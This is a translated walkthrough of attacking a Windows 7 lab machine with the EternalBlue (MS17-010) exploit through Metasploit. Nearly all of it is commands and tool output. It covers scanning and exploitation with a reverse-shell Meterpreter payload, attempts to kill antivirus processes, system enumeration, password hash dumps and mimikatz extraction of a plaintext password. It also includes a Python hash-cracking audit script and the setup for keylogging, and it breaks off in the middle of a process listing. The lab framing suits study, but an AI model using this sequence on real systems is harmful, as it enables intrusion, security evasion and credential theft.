# Exploiting EternalBlue (MS17-010)

> Lab environment:
>
> Kali VM: attacker
>
> Win7 VM: target
>
> Main tool: Metasploit

## Getting a Meterpreter session

1. Search Metasploit with the keyword `17-010`:

```
msf5 > search 17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   1  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   2  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
```

2. Use the auxiliary module `auxiliary/scanner/smb/smb_ms17_010` to check whether the vulnerability is present:

```
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target address range or CIDR identifier
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.8.129:445     - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.129:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

The line "Host is likely VULNERABLE to MS17-010!…" tells us the vulnerability is present.

3. Exploit the vulnerability to get a reverse shell, i.e. a Meterpreter session. **360 Safeguard (360安全卫士) blocks this**; the target must not have 360 installed, or 360 has to be turned off.

```
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.129
rhosts => 192.168.8.129
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.124
lhosts => 192.168.8.124
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.8.124:4444
[*] 192.168.8.129:445 - Connecting to target for exploitation.
```
```
[+] 192.168.8.129:445 - Connection established for exploitation.
[+] 192.168.8.129:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.8.129:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.8.129:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.8.129:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service
[*] 192.168.8.129:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1
[+] 192.168.8.129:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.8.129:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.8.129:445 - Sending all but last fragment of exploit packet
[*] Sending stage (206403 bytes) to 192.168.8.129
[*] Meterpreter session 1 opened (192.168.8.124:4444 -> 192.168.8.129:49475) at 2019-10-12 03:50:01 -0400
[-] 192.168.8.129:445 - RubySMB::Error::CommunicationError: RubySMB::Error::CommunicationError

meterpreter >
```

## Checking the current privileges

```
meterpreter > shell
Process 2132 created.
Channel 1 created.
Microsoft Windows [版本 6.1.7601]
版权所有 (c) 2009 Microsoft Corporation。保留所有权利。

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>exit
exit
meterpreter >
```

We are running as `system`.

You can also run `getuid` directly in Meterpreter to check the current user:

```
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

## Privilege escalation

If the session is not SYSTEM, try escalating:

```
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

Seeing "got system via technique..." means the escalation succeeded.

## Disabling antivirus software

1. Customize the dictionary

Edit `/usr/share/metasploit-framework/data/wordlists/av_hips_executables.txt` and add the antivirus process names you want to kill, e.g. zhudongfangyu.exe and 360tray.exe, all lowercase.

2. Kill the antivirus processes

- killav

**Do not use `run killav`.**

```
meterpreter > run post/windows/manage/killav
[*] Attempting to terminate 'ZhuDongFangYu.exe' (PID: 1064) ...
[-] Failed to terminate 'ZhuDongFangYu.exe' (PID: 1064).
[*] Attempting to terminate '360Tray.exe' (PID: 3408) ...
[-] Failed to terminate '360Tray.exe' (PID: 3408).
[+] A total of 2 process(es) were discovered, 0 were terminated.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```

We are clearly SYSTEM, yet the processes were not killed. Annoying.

- powershell

Dropping into the target with `shell` and then running `powershell` to open an interactive PowerShell prompt does not work: commands typed there get no response, so PowerShell commands cannot be run on the target that way. Use the following method instead.

```
meterpreter > load
load espia        load kiwi         load peinjector   load sniffer
load extapi       load lanattacks   load powershell   load unhook
load incognito    load mimikatz     load python       load winpmem
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > help powershell

Powershell Commands
===================

    Command             Description
    -------             -----------
    powershell_execute  Execute a Powershell command string
    powershell_import   Import a PS1 script or .NET Assembly DLL
    powershell_shell    Create an interactive Powershell prompt

meterpreter > powershell_shell
PS > Get-Process

Handles  NPM(K)    PM(K)      WS(K) VM(M)   CPU(s)     Id ProcessName
-------  ------    -----      ----- -----   ------     -- -----------
    173      20    13964       9544   117     0.23   1732 360leakfixer
    584      55    99776     105588   317     8.49   3944 360Safe
   1936     152   164724      20452   577    12.62   3408 360Tray
     32       5     1088       3100    49     0.02    696 conhost
     31       5     1084       3108    49     0.05   1448 conhost
    515      12     2100       4360    83     0.50    364 csrss
    574      15    10624      10204   178     2.64    468 csrss
    195      16     4328       6932    57     0.56   1936 dllhost
    126      14    51340      38100   130     1.05   2592 dwm
    706      49    28940      46708   247     7.92   2632 explorer
     64       7     1040       2832    35     0.03   1496 Ext2Srv
      0       0        0         24     0               0 Idle
     40       5      940       2392    21     0.00   1552 imdsksvc
    772      24     4304       8300    45     2.09    572 lsass
    204      10     2768       5024    33     0.11    580 lsm
     50       8      996       2952    47     0.03   1584 metsvc
    148      17     3476       4484    61     0.06   2192 msdtc
    257      22    51456      55128   558     0.30   1608 powershell
    271      22    51200      55432   559     0.22   3936 powershell
    778      55    34844      16556   147     1.06   2076 SearchIndexer
    228      14     5372       6572    44     2.15    556 services
    405      31     9896      14852   163     0.94   3712 sesvc
     30       2      452        776     4     0.12    276 smss
    306      31    10076      13592   137     0.98   1856 SoftMgrLite
    648      54    84828      76780   639     0.90   1284 spoolsv
    508      17     5880       7316    44     1.26    548 svchost
    361      14     4364       7272    46     2.40    688 svchost
    268      16     3840       6712    38     0.34    792 svchost
    472      23    17756      14100    84     3.07    860 svchost
    427      24    66132      68028   162    13.32    940 svchost
   1183      52    20824      24108   408     6.65    984 svchost
    571      35    14256      12320    92     1.93   1144 svchost
    143      15     2612      13328    51     0.34   1292 svchost
    257      30     5788       7968    49     0.53   1332 svchost
     94       8     1648       3592    47     0.02   1916 svchost
    103      13     1872       5000    34     0.14   1992 svchost
    314      41    61952       5296   129     0.73   2916 svchost
    646       0      112        368     3               4 System
    205      16     7412       8980    83     0.27   2504 taskhost
    127      12     3640      13272   112     7.52   3440 taskmgr
    280      23    11824        912   128     1.67   1016 updater
     87      10     5224       3744    62     0.08   1632 VGAuthService
     56       6     1436       2748    39     0.00    748 vmacthlp
    310      25    10320      11500   100     5.88   1688 vmtoolsd
    244      22    10488      15192   125     6.63   2788 vmtoolsd
     82      10     1560       3988    57     0.09    456 wininit
    118      10     2964       5708    66     0.25    520 winlogon
    230      15     7052      10468    52            1208 WmiPrvSE
    382      35    10520      10848   105     1.05   1064 ZhuDongFangYu

PS > Stop-Process 1064
ERROR: Stop-Process : ??????????????ZhuDongFangYu (1064)?: ?????
ERROR: ???? ?:1 ??: 13
ERROR: + Stop-Process <<<< 1064
ERROR:     + CategoryInfo          : CloseError: (System.Diagnost...(ZhuDongFangYu):Process) [Stop-Process], ProcessCommandEx
EERROR:     + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
ERROR:
PS >
```

Here the powershell extension is loaded in Meterpreter and `powershell_shell` opens an interactive PowerShell prompt. Get-Process shows the ZhuDongFangYu process with PID 1064, but Stop-Process still fails to kill it. Still annoying.

## Disabling the firewall

Skipped.

## Information gathering

### Getting detailed information about the target host

- run scraper

Collects system information, environment variables, network, services, users, domain, password hashes and more.

```
meterpreter > run scraper
[*] New session on 192.168.8.129:445...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Windows\TEMP\oksMbdKb.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:\Windows\TEMP\xZUHpvAU.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:\Windows\TEMP\pcrWzade.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:\Windows\TEMP\AXZDmEKp.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:\Windows\TEMP\jaOsLEOM.reg)
[*]  Cleaning HKU
[*] Completed processing on 192.168.8.129:445...
meterpreter >
```

- run winenum

Part of its output overlaps with run scraper.

```
meterpreter > run winenum
[*] Running Windows Local Enumeration Meterpreter Script
[*] New session on 192.168.1.8:445...
[*] Saving general report to /root/.msf4/logs/scripts/winenum/PC_20191012.5354/PC_20191012.5354.txt
[*] Output of each individual command is saved to /root/.msf4/logs/scripts/winenum/PC_20191012.5354
[*] Checking if PC is a Virtual Machine ........
[*]     This is a VMware Workstation/Fusion Virtual Machine
[*] UAC is Disabled
[*] Running Command List ...
[*]     running command arp -a
[*]     running command ipconfig /displaydns
[*]     running command ipconfig /all
[*]     running command route print
[*]     running command cmd.exe /c set
[*]     running command netstat -ns
[*]     running command netstat -nao
[*]     running command net accounts
[*]     running command netstat -vb
[*]     running command net view
[*]     running command net localgroup
[*]     running command net group administrators
[*]     running command net session
[*]     running command net share
[*]     running command net group
[*]     running command net user
[*]     running command net view /domain
[*]     running command netsh firewall show config
[*]     running command net localgroup administrators
[*]     running command tasklist /svc
[*]     running command netsh wlan show drivers
[*]     running command gpresult /SCOPE USER /Z
[*]     running command netsh wlan show networks mode=bssid
[*]     running command gpresult /SCOPE COMPUTER /Z
[*]     running command netsh wlan show profiles
[*]     running command netsh wlan show interfaces
[*] Running WMIC Commands ....
[*]     running command wmic group list
[*]     running command wmic service list brief
[*]     running command wmic netlogin get name,lastlogon,badpasswordcount
[*]     running command wmic logicaldisk get description,filesystem,name,size
[*]     running command wmic useraccount list
[*]     running command wmic netuse get name,username,connectiontype,localname
[*]     running command wmic nteventlog get path,filename,writeable
[*]     running command wmic volume list brief
[*]     running command wmic share get name,path
[*]     running command wmic netclient list brief
[*]     running command wmic qfe
[*]     running command wmic startup list full
[*]     running command wmic rdtoggle list
[*]     running command wmic product get name,version
[*] Extracting software list from registry
[*] Dumping password hashes...
[*] Hashes Dumped
[*] Getting Tokens...
[*] All tokens have been processed
[*] Done!
meterpreter >
```
### Listing the applications installed on the target

```
meterpreter > run post/windows/gather/enum_applications

[*] Enumerating applications installed on PC

Installed Applications
======================

 Name                                                            Version
 ----                                                            -------
 Advanced Archive Password Recovery                              4.54.110.4540
 Elcomsoft Forensic Disk Decryptor                               1.00.110.1392
 Ext2Fsd 0.69                                                    0.69
 Java 8 Update 121 (64-bit)                                      8.0.1210.13
 Java Auto Updater                                               2.8.181.13
 Java SE Development Kit 8 Update 121 (64-bit)                   8.0.1210.13
 Microsoft .NET Framework 4.7.2                                  4.7.03062
 Microsoft .NET Framework 4.7.2                                  4.7.03062
 Microsoft .NET Framework 4.7.2 (CHS)                            4.7.03062
 Microsoft .NET Framework 4.7.2 (简体中文)                        4.7.03062
 Microsoft Visual C++ 2005 Redistributable                       8.0.61187
 Microsoft Visual C++ 2005 Redistributable (x64)                 8.0.61186
 Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161  9.0.30729.6161
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148  9.0.30729.4148
 Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.7523  9.0.30729.7523
 Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219      10.0.40219
 Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219      10.0.40219
 Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030    11.0.61030.0
 Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030    11.0.61030.0
 Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61135   11.0.61135
 Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61135      11.0.61135
 Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61135   11.0.61135
 Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61135      11.0.61135
 Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40664    12.0.40664.0
 Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.40664    12.0.40664.0
 Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.40664   12.0.40664
 Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.40664      12.0.40664
 Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.40664   12.0.40664
 Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.40664      12.0.40664
 Microsoft Visual C++ 2017 Redistributable (x64) - 14.15.26706   14.15.26706.0
 Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706   14.15.26706.0
 Microsoft Visual C++ 2017 x64 Additional Runtime - 14.15.26706  14.15.26706
 Microsoft Visual C++ 2017 x64 Minimum Runtime - 14.15.26706     14.15.26706
 Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706  14.15.26706
 Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706     14.15.26706
 Python 2.7.13 (64-bit)                                          2.7.13150
 Python 3.7.3 Add to Path (64-bit)                               3.7.3150.0
 Python 3.7.3 Core Interpreter (64-bit)                          3.7.3150.0
 Python 3.7.3 Development Libraries (64-bit)                     3.7.3150.0
 Python 3.7.3 Documentation (64-bit)                             3.7.3150.0
 Python 3.7.3 Executables (64-bit)                               3.7.3150.0
 Python 3.7.3 Standard Library (64-bit)                          3.7.3150.0
 Python 3.7.3 Tcl/Tk Support (64-bit)                            3.7.3150.0
 Python 3.7.3 Test Suite (64-bit)                                3.7.3150.0
 Python 3.7.3 Utility Scripts (64-bit)                           3.7.3150.0
 Python 3.7.3 pip Bootstrap (64-bit)                             3.7.3150.0
 Python Launcher                                                 3.7.6657.0
 SecureCRT V6.2.3.313 汉化版                                      V6.2.3.313 汉化版
 SilentEye                                                       0.4.1
 Stellar Phoenix JPEG Repair                                     5.0.0.0
 Stellar Phoenix Photo Recovery Professional                     8.0.0.1
 Update for Microsoft .NET Framework 4.7.2 (KB4087364)           1
 Update for Microsoft .NET Framework 4.7.2 (KB4457035)           1
 VMware Tools                                                    10.0.0.2977863
 WinRAR 5.11 (64-位)                                              5.11.0
 Windows Mobile Connectivity Tools 10.0.15254.0 - Desktop x86    10.1.15254.1
 Windows SDK AddOn                                               10.1.0.0
 搜狗输入法 9.1正式版                                              9.1.0.2657

[+] Results stored in: /root/.msf4/loot/20191012053311_default_192.168.8.129_host.application_804807.txt
meterpreter >
```

### Listing the users on the target

```
meterpreter > run post/windows/gather/enum_logged_on_users

[*] Running against session 1

Current Logged Users
====================

 SID                                           User
 ---                                           ----
 S-1-5-18                                      NT AUTHORITY\SYSTEM
 S-1-5-21-1244648496-323992457-611466280-1000  PC\XinSai

[+] Results saved in: /root/.msf4/loot/20191012053946_default_192.168.8.129_host.users.activ_091950.txt

Recently Logged Users
=====================

 SID                                           Profile Path
 ---                                           ------------
 S-1-5-18                                      %systemroot%\system32\config\systemprofile
 S-1-5-19                                      C:\Windows\ServiceProfiles\LocalService
 S-1-5-20                                      C:\Windows\ServiceProfiles\NetworkService
 S-1-5-21-1244648496-323992457-611466280-1000  C:\Users\XinSai
 S-1-5-21-1244648496-323992457-611466280-501   C:\Users\Guest

meterpreter >
```

### Dumping the users' password hashes

```
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
meterpreter >
```

The format is `username:SID:LM hash:NTLM hash:::`; the hashes can then be cracked with a tool such as `John the Ripper`.

### Dumping the users' plaintext passwords

Meterpreter ships a number of extensions; type `load` and press TAB twice to list them:

```
meterpreter > load
load espia        load kiwi         load peinjector   load sniffer
load extapi       load lanattacks   load powershell   load unhook
load incognito    load mimikatz     load python       load winpmem
meterpreter > load
```

- kiwi module

Load the kiwi module, then run `creds_all`.

```
meterpreter > load kiwi
Loading extension kiwi...
  .#####.   mimikatz 2.1.1 20180925 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##   > http://blog.gentilkiwi.com/mimikatz
 '## v ##'   Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'    > http://pingcastle.com / http://mysmartlogon.com  ***/

Success.
```
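A note on the hashdump output above before the in-memory credential modules: the numeric field in each line is the account RID (the last component of the SID), and the Administrator and Guest entries carry the well-known NT hash of the empty password. The following added example, which is not from the original post or from Metasploit, parses that `user:rid:LM:NT:::` format and audits it offline: it flags blank-password entries (on Windows 7 the built-in Administrator is disabled by default, but a blank hash is still worth reporting), flags accounts that still store a real LM hash, and checks a short list of candidate passwords against the NT hashes. The NT hash is MD4 over the UTF-16LE encoding of the password; because `hashlib.new("md4")` is unavailable on many current OpenSSL builds, MD4 is implemented inline. The candidate list and the `EMPTY_LM`/`EMPTY_NT` names are choices made for this example.

```python
"""Offline audit of a hashdump (pwdump-format) listing.

Added example for this page, not from the original post or from Metasploit.
"""
import struct

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM field when no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password


def _lrot(x: int, n: int) -> int:
    x &= 0xFFFFFFFF
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, little-endian, implemented inline for portability."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    r3_order = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1: words in order
            a, b, c, d = d, _lrot(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: words 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _lrot(a + g(b, c, d) + x[k] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: bit-reversed word order
            a, b, c, d = d, _lrot(a + h(b, c, d) + x[r3_order[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = ((a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF,
                          (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF)
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash = MD4(UTF-16LE(password)), as a lowercase hex string."""
    return md4(password.encode("utf-16-le")).hex()


def parse_hashdump(text: str):
    """Parse `user:rid:LM:NT:::` lines into dicts."""
    rows = []
    for line in text.strip().splitlines():
        user, rid, lm, nt, *_ = line.split(":")
        rows.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return rows


def audit_hashdump(text: str, candidates=()):
    """Return (user, finding) pairs: blank passwords, stored LM hashes,
    and NT hashes equal to one of the supplied candidate passwords."""
    findings = []
    by_hash = {nt_hash(p): p for p in candidates}
    for r in parse_hashdump(text):
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored"))
        if r["nt"] in by_hash:
            findings.append((r["user"], f"matches candidate '{by_hash[r['nt']]}'"))
    return findings


# The three lines from the hashdump output on this page.
HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
XinSai:1000:aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634:::
"""

if __name__ == "__main__":
    # Candidate list is a constructed example of a weak-password policy check.
    for user, finding in audit_hashdump(HASHDUMP, candidates=["admin", "Password1"]):
        print(f"{user}: {finding}")
```

Run against the page's own dump, the audit reports Administrator and Guest as blank and XinSai as matching `admin`, which is exactly what the kiwi output below confirms from memory. The same parser works on a `secretsdump`-style or John-format file, since they share the colon-separated layout.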
```
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain  LM                                NTLM                              SHA1
--------  ------  --                                ----                              ----
XinSai    PC      f0d412bd764ffe81aad3b435b51404ee  209c6174da490caeb422f3fa5a7ae634  7c87541fd3f3ef5016e12d411900c87a6046a8e8

wdigest credentials
===================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
PC$       WORKGROUP  (null)
XinSai    PC         admin

tspkg credentials
=================

Username  Domain  Password
--------  ------  --------
XinSai    PC      admin

kerberos credentials
====================

Username  Domain     Password
--------  ------     --------
(null)    (null)     (null)
XinSai    PC         admin
pc$       WORKGROUP  (null)

meterpreter >
```

User XinSai's password is "admin".

- mimikatz module

Load the mimikatz module, then run wdigest:

```
meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds.
    livessp           Attempt to retrieve livessp creds.
    mimikatz_command  Run a custom command.
    msv               Attempt to retrieve msv creds (hashes).
    ssp               Attempt to retrieve ssp creds.
    tspkg             Attempt to retrieve tspkg creds.
    wdigest           Attempt to retrieve wdigest creds.

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;816638  NTLM       PC            xman666        mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;372325  NTLM       PC            XinSai         mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;996     Negotiate  WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;48926   NTLM                                    mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)
0;999     NTLM       WORKGROUP     PC$            mod_process::getVeryBasicModulesListForProcess : (0x0000012b) 艑�� ReadProcessMemory WriteProcessMemory 鰾 n.a. (wdigest KO)

meterpreter >
```

No passwords this time though. Fail.

### Sniffing

#### Keylogging

- keyscan_dump

Meterpreter can also log keystrokes on the target. Keylogging involves three commands:

> keyscan_start: start the keystroke logger
>
> keyscan_dump: show the captured keystrokes
>
> keyscan_stop: stop the keystroke logger

To log keystrokes you usually have to bind to the right target process. Below we migrate Meterpreter into winlogon.exe and capture keystrokes in the logon process to obtain the user's password.

1. Binding to the process

```
meterpreter > ps

Process List
============

 PID   PPID  Name                    Arch  Session  User                          Path
 ---   ----  ----                    ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                  x64   0
 240   4     smss.exe                x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 328   320   csrss.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 340   908   dwm.exe                 x64   3                                      C:\Windows\system32\Dwm.exe
 384   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 412   320   wininit.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 524   412   services.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 540   412   lsass.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 548   412   lsm.exe                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 616   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE
 648   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 712   524   vmacthlp.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 744   524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE
 816   524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 908   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 960   524   svchost.exe             x64   0        NT AUTHORITY\SYSTEM
 1032  1176  QwdqufeOMpX.exe         x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\QwdqufeOMpX.exe
 1088  4060  LogonUI.exe             x64   4        NT AUTHORITY\SYSTEM           C:\Windows\system32\LogonUI.exe
 1112  1176  sQoycPhez.exe           x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\sQoycPhez.exe
 1176  524   spoolsv.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1212  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 1268  524   msdtc.exe               x64   0        NT AUTHORITY\NETWORK SERVICE
 1320  524   Ext2Srv.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Program Files\Ext2Fsd\Ext2Srv.exe
 1364  524   imdsksvc.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\imdsksvc.exe
 1412  524   VGAuthService.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 1456  524   vmtoolsd.exe            x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1584  524   taskhost.exe            x64   3                                      C:\Windows\system32\taskhost.exe
 1732  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
 1796  524   svchost.exe             x64   0        NT AUTHORITY\NETWORK SERVICE
 1956  524   dllhost.exe             x64   0        NT AUTHORITY\SYSTEM
 1996  648   WmiPrvSE.exe
 2284  1088  csrss.exe               x64   3        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 2408  2732  SearchFilterHost.exe    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
 2496  2272  explorer.exe            x64   3                                      C:\Windows\Explorer.EXE
 2596  524   svchost.exe             x64   0        NT AUTHORITY\LOCAL SERVICE
